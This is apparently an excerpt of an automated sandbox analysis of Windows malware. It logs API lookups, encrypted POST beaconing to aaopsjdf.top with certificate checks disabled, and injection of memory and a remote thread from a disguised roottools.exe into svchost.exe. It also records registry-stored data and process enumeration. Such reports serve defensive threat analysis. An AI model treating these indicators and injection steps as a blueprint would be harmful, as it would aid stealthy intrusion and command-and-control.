Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsDirectoryEmptyW, address_out = 0x7510cd81	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrCmpNIW, address_out = 0x750e4745	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRenameExtensionW, address_out = 0x7510d32a	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrStrIW, address_out = 0x750e46e9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathMatchSpecW, address_out = 0x750e86f7	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathCombineW, address_out = 0x750ec39c	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x750e3248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAddBackslashW, address_out = 0x750ec177	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = wvnsprintfW, address_out = 0x7511066c	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathUnquoteSpacesW, address_out = 0x750e5331	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathSkipRootW, address_out = 0x750ffbf5	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x750ea1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = SHDeleteValueW, address_out = 0x750dfcca	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = wvnsprintfA, address_out = 0x750fedfe	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathIsDirectoryW, address_out = 0x750dff07	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveBackslashW, address_out = 0x750e5c62	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = UrlUnescapeA, address_out = 0x750fc6fb	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathQuoteSpacesW, address_out = 0x7510ce21	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleFileNameExW, address_out = 0x74eb13f0	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CLSIDFromString, address_out = 0x7546e599	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeEx, address_out = 0x754909ad	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CreateStreamOnHGlobal, address_out = 0x7547363b	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoSetProxyBlanket, address_out = 0x75465ea5	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75499d0b	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x754986d3	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = DeleteObject, address_out = 0x75145689	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = GetDeviceCaps, address_out = 0x75144de0	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateDCW, address_out = 0x7514e743	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateCompatibleDC, address_out = 0x751454f4	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = SelectObject, address_out = 0x75144f70	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = CreateCompatibleBitmap, address_out = 0x75145f49	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = BitBlt, address_out = 0x75145ea6	1	Fn
Get Address	c:\windows\syswow64\gdi32.dll	function = DeleteDC, address_out = 0x751458b3	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetConnectA, address_out = 0x753749e9	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x7536b406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoA, address_out = 0x7536a33e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetQueryOptionA, address_out = 0x75361b56	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpOpenRequestA, address_out = 0x75374c7d	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCrackUrlA, address_out = 0x7535d075	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetSetOptionA, address_out = 0x753675e8	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x7537f18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x7536ab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpSendRequestA, address_out = 0x753e18f8	1	Fn
Get Address	c:\windows\syswow64\urlmon.dll	function = ObtainUserAgentString, address_out = 0x76c71d76	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x76b63eae	1	Fn
Get Address	c:\windows\syswow64\secur32.dll	function = GetUserNameExW, address_out = 0x74dea415	1	Fn
Get Address	c:\windows\syswow64\ntdll.dll	function = NtQuerySystemInformation, address_out = 0x7728fda0	1	Fn

System (182)

Operation	Additional Information	Count	Logfile
Sleep	duration = -1 (infinite)	2	Fn
Sleep	duration = 600000 milliseconds (600.000 seconds)	1	Fn
Sleep	duration = -1 (infinite)	18	Fn
Get Time	type = System Time, time = 2018-01-10 18:54:59 (UTC)	1	Fn
Get Time	type = System Time, time = 2018-01-10 18:55:08 (UTC)	1	Fn
Get Info	type = Operating System	127	Fn
Get Info	type = SYSTEM_PROCESS_INFORMATION	16	Fn
Get Info	type = SYSTEM_PROCESS_INFORMATION	16	Fn

Mutex (10)

Operation	Additional Information	Count	Logfile
Create	mutex_name = E58EFF540968A436E982FCFA1C0445A2	1	Fn
Create	mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4	1	Fn
Create	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Create	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	2	Fn
Create	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Release	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn
Release	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	2	Fn
Release	mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE	1	Fn

Network Behavior

HTTP Sessions (2)

Information	Value
Total Data Sent	1.44 KB (1474 bytes)
Total Data Received	8.80 KB (9016 bytes)
Contacted Host Count	1
Contacted Hosts	aaopsjdf.top

HTTP Session #1

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.72 KB (736 bytes)
Data Received	5.65 KB (5788 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /rJpywFLn/qEw5K/MR6O/POc/7o/nJ0wa/sGw, accept_types = 802816, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close ,Ä, url = aaopsjdf.top/rJpywFLn/qEw5K/MR6O/POc/7o/nJ0wa/sGw	1	Fn
Send HTTP Request	headers = Connection: close ,Ä, url = aaopsjdf.top/rJpywFLn/qEw5K/MR6O/POc/7o/nJ0wa/sGw	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 4096	1	Fn Data
Read Response	size = 4096, size_out = 1688	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	2	Fn

HTTP Session #2

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.72 KB (738 bytes)
Data Received	3.15 KB (3228 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /Ar1DanzSs/m3/R4FdJSDs6/d5Y/uB/4CGO/Dw, accept_types = 802816, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close 0Zñ, url = aaopsjdf.top/Ar1DanzSs/m3/R4FdJSDs6/d5Y/uB/4CGO/Dw	1	Fn
Send HTTP Request	headers = Connection: close 0Zñ, url = aaopsjdf.top/Ar1DanzSs/m3/R4FdJSDs6/d5Y/uB/4CGO/Dw	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 3224	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	2	Fn

Process #13: svchost.exe

(Host: 2024, Network: 0)

Information	Value
ID	#13
File Name	c:\windows\syswow64\svchost.exe
Command Line	C:\Windows\SysWOW64\svchost.exe -k netsvcs
Initial Working Directory	C:\Users\aETAdzjz\AppData\Roaming\
Monitor	Start Time: 00:03:35, Reason: Child Process
Unmonitor	End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration	00:06:38

OS Process Information

Information	Value
PID	0x5fc
Parent PID	0x7a8 (c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x A7C 0x A84 0x A88 0x 970 0x A8C 0x 960 0x 964 0x 968 0x 96C 0x 7A0 0x 89C

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
imm32.dll	0x00020000	0x0003dfff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x00026fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00031fff	Pagefile Backed Memory	Readable, Writable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000070000	0x00070000	0x0008bfff	Private Memory	Readable, Writable, Executable	Region Actions
locale.nls	0x00090000	0x000f6fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000110000	0x00110000	0x00110fff	Private Memory	Readable, Writable	Region Actions
rsaenh.dll	0x00120000	0x0015bfff	Memory Mapped File	Readable	Region Actions
private_0x0000000000120000	0x00120000	0x0015ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000160000	0x00160000	0x0016dfff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000160000	0x00160000	0x0016cfff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000170000	0x00170000	0x001affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000001b0000	0x001b0000	0x001effff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000220000	0x00220000	0x0025ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000260000	0x00260000	0x0029ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000002a0000	0x002a0000	0x002dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000002f0000	0x002f0000	0x0032ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000320000	0x00320000	0x0035ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000390000	0x00390000	0x003cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000003d0000	0x003d0000	0x0044ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000480000	0x00480000	0x004bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000004f0000	0x004f0000	0x005effff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000650000	0x00650000	0x0068ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000006b0000	0x006b0000	0x006effff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000720000	0x00720000	0x0072ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000730000	0x00730000	0x008b7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000008c0000	0x008c0000	0x00a40fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000a50000	0x00a50000	0x00e42fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000e80000	0x00e80000	0x00ebffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000ee0000	0x00ee0000	0x00f1ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000f40000	0x00f40000	0x00f7ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000fa0000	0x00fa0000	0x00fdffff	Private Memory	Readable, Writable	Region Actions
svchost.exe	0x00fe0000	0x00fe7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000ff0000	0x00ff0000	0x023effff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000023f0000	0x023f0000	0x0265ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002400000	0x02400000	0x0243ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002440000	0x02440000	0x0247ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002490000	0x02490000	0x024cffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002530000	0x02530000	0x0256ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002580000	0x02580000	0x025bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000025e0000	0x025e0000	0x0265ffff	Private Memory	Readable, Writable	Region Actions
sortdefault.nls	0x02660000	0x0292efff	Memory Mapped File	Readable	Region Actions
private_0x0000000002930000	0x02930000	0x0296ffff	Private Memory	Readable, Writable	Region Actions
wow64cpu.dll	0x746f0000	0x746f7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x74700000	0x7475bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x74760000	0x7479efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x74880000	0x748bafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x748c0000	0x748d5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
secur32.dll	0x748e0000	0x748e7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74dc0000	0x74dcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74dd0000	0x74e2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x74e30000	0x74e8ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x74e90000	0x74ea8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x74eb0000	0x74eb4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x74ec0000	0x750bafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x750c0000	0x750cbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x750d0000	0x75126fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75130000	0x751bffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75250000	0x75295fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x752a0000	0x7534bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x75350000	0x75444fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x75450000	0x755abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x755b0000	0x7564cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x756e0000	0x7577ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75780000	0x75789fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75790000	0x7588ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x758d0000	0x759ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x759f0000	0x75afffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x75b00000	0x75bcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x75c50000	0x76899fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x76b60000	0x76beefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x76c40000	0x76d75fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x76d80000	0x76e6ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000076e70000	0x76e70000	0x76f69fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000076f70000	0x76f70000	0x7708efff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77090000	0x77238fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77270000	0x773effff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007ef9b000	0x7ef9b000	0x7ef9dfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ef9e000	0x7ef9e000	0x7efa0fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efa1000	0x7efa1000	0x7efa3fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efa4000	0x7efa4000	0x7efa6fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efa7000	0x7efa7000	0x7efa9fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efaa000	0x7efaa000	0x7efacfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efad000	0x7efad000	0x7efaffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Injection Information

Injection Type	Source Process	Source Os Thread ID	Injection Info	Count	Logfile
Modify Memory	#7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x97c	address = 0x70000, size = 114688	1	Fn Data
Modify Memory	#7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x97c	address = 0x876c4, size = 4	1	Fn Data
Modify Memory	#7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x97c	address = 0x877d0, size = 4	1	Fn Data
Modify Memory	#7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x97c	address = 0x87d38, size = 4	1	Fn Data
Create Remote Thread	#7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x97c	address = 0x795bc	1	Fn

Host Behavior

File (4)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Temp\xeyzlap	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Temp\giilemz	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	type = size, size_out = 0	1	Fn

Registry (18)

Operation	Key	Additional Information	Count	Logfile
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	3	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	4	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_NONE	1	Fn
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, size = 1776, type = REG_BINARY	1	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, size = 1776, type = REG_BINARY	1	Fn Data

Process (907)

Operation	Process	Additional Information	Count	Logfile
Open	System	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\smss.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\wininit.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\winlogon.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\services.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\lsass.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\lsm.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\audiodg.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\spoolsv.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_QUERY_INFORMATION	20	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_QUERY_INFORMATION	20	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_QUERY_INFORMATION	20	Fn
Open	c:\windows\system32\taskeng.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\windows\system32\taskeng.exe	desired_access = PROCESS_QUERY_INFORMATION	16	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	20	Fn
Open	c:\windows\system32\wbem\wmiprvse.exe	desired_access = PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\rundll32.exe	desired_access = PROCESS_QUERY_INFORMATION	20	Fn
Open	c:\program files (x86)\google\luxury-westminster-editing-cube.exe	desired_access = PROCESS_QUERY_INFORMATION	20	Fn
Open	c:\program files\uninstall information\devon stickers.exe	desired_access = PROCESS_QUERY_INFORMATION	20	Fn
Open	c:\program files\windows photo viewer\eagles_podcast_type_marker.exe	desired_access = PROCESS_QUERY_INFORMATION	20	Fn
Open	c:\program files (x86)\windows mail\groups.exe	desired_access = PROCESS_QUERY_INFORMATION	20	Fn
Open	c:\program files\windows photo viewer\filesdetectedlosebenjamin.exe	desired_access = PROCESS_QUERY_INFORMATION	20	Fn
Open	c:\program files (x86)\mozilla firefox\cincinnati consumers se.exe	desired_access = PROCESS_QUERY_INFORMATION	20	Fn
Open	c:\program files (x86)\common files\simply_wa_thumbnail_programmers.exe	desired_access = PROCESS_QUERY_INFORMATION	20	Fn
Open	c:\program files\dvd maker\medicaid.exe	desired_access = PROCESS_QUERY_INFORMATION	20	Fn
Open	c:\program files (x86)\java\gateway.exe	desired_access = PROCESS_QUERY_INFORMATION	20	Fn
Open	c:\program files\windows nt\laden.exe	desired_access = PROCESS_QUERY_INFORMATION	20	Fn
Open	c:\program files (x86)\windows media player\lying-yourself.exe	desired_access = PROCESS_QUERY_INFORMATION	19	Fn
Open	c:\program files\windows nt\disclaimer_saudi_agreed_oem.exe	desired_access = PROCESS_QUERY_INFORMATION	19	Fn
Open	c:\program files (x86)\adobe\colleague wrap.exe	desired_access = PROCESS_QUERY_INFORMATION	19	Fn
Open	c:\program files\microsoft office\hottest-jm-depression-fought.exe	desired_access = PROCESS_QUERY_INFORMATION	19	Fn
Open	c:\program files (x86)\google\saturday.exe	desired_access = PROCESS_QUERY_INFORMATION	19	Fn
